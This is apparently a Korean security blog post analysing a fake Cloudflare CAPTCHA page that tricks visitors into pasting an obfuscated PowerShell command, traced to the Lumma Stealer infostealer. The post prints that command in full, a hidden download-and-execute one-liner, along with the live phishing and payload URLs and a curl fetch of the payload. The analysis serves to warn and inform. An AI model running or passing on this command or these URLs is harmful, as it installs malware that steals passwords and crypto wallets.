인터넷 여기저기를 돌아다니다가 재밌는 패턴을 하나 발견했다.
바로바로바로 Cloudflare로 위장한.. 피싱 페이지인데
블로그 방문자들에게도 알릴 겸 분석 글을 작성해보았다.
1. Webpage Deception / Impersonation
피싱 페이지랄까.. 다음 링크를 클릭하면(조심하자.. 실제 악성코드 배포지다)
https://vfy2.help/?t=0ea7adf3c0856de5a9ca9ed413cb69d072cc707241cdb1fc72899e2a5c1662a23aa7db80b606d7a9a8567ff590ef8c912892a4b79c7542fe6ae0e9fd2c255838
다음과 같이 cloudflare 캡챠 페이지가 나온다.
체크를 클릭하면 다음 그림처럼
실행 > 붙여넣기 > 엔터 순으로 유도를 한다.
다시 말하지만 절대로 따라하면 안된다. 저 체크박스를 클릭하는 순간 이미 우리 클립보드에는 다음 난독화된 파워쉘 코드가 복사되어 있다.
PoWerSHell -"WiN" Hi"d"den -c"om"m"a"Nd "IE"X" ((Ne"w-"Ob"j"e"c"t Net.W"e"bCl"i"en"t).D"o"wnl"o"adS"tri"n"g('h"t"t"ps:/"/u"i3.f"it/"W"e"X.pdf'))"딱 봐도 수상한 냄새가 난다. 악성파일 유포지는 https://ui3.fit/WeX.pdf 인데
(New-Object Net.WebClient).DownloadString('https://ui3.fit/WeX.pdf') 로 문자열을 다운로드 받고있다.
전형적인 fileless + LotL 공격 기법이다.
이 단계에서는 다음 공격 기법이 사용되었다.
- T1566 – Phishing
- Phishing: Spearphishing Link (T1566.002)
- 사용자에게 링크 클릭을 유도해서 악성 스크립트(PowerShell 등)를 실행.
- Phishing: Spearphishing Link (T1566.002)
- T1204 – User Execution
- 사용자에게 직접 악성 코드 실행을 유도하는 전형적인 수법.
2. 악성코드 확인
궁금해서 실제로 다운받아 봤다. (절대 따라하지 말것..)
curl -v -L https://ui3.fit/WeX.pdf 을 사용했는데 파일로 생성되지가 않아서 리다이렉트해 파일로 만들었다.
누가봐도 pdf 파일 컨텐츠가 아니고 powershell 코드가 들어있다. 거기다 공격자들이 자주 사용하는 난독화 기법이 들어있다.
쉘 코드인지, 인코딩된 코드인지는 분석해봐야 한다.
3. 악성코드 추출
약 10만줄의 악성 코드가 확인된다.
그리고 xor 인코딩을 수행한다.
즉 xor 인코딩을 수행하면 공격자의 목적 코드를 확보할 수 있다는 말이 된다.
분석 결과 4D 5A 시그니쳐를 가지는 PE 실행파일로 확인이 되었다.
해시 확인해서 VT 검색 결과 Lumma Stealer로 확인 된다. Lumma Stealer는 코인 지갑 정보, 암호정보 등을 탈취하는 인포스틸러 악성코드다.
VirusTotal
www.virustotal.com
https://www.piolink.com/kr/service/Security-Analysis.php?bbsCode=security&vType=view&idx=136&page=1
파이오링크- ADC, 웹방화벽, 보안스위치, HCI, 보안관제, 보안컨설팅
파이오링크- ADC, 웹방화벽, 보안스위치, HCI, 보안관제, 보안컨설팅
www.piolink.com
'콤푸타 > 해킹&보안' 카테고리의 다른 글
| nmap 옵션 정리 (2) | 2025.07.08 |
|---|---|
| [OSINT] 국내 정보 보안 보고서들(한글) (0) | 2025.07.02 |
| 보이스피싱 번호, 웹페이지 공개 (0) | 2025.06.19 |
| [windows] 윈도우 관리도구(mmc, cpl, msc, exe) 정리 (1) | 2025.06.18 |
| [hacking] 운영체제 별 자동실행 기능들 (0) | 2025.06.18 |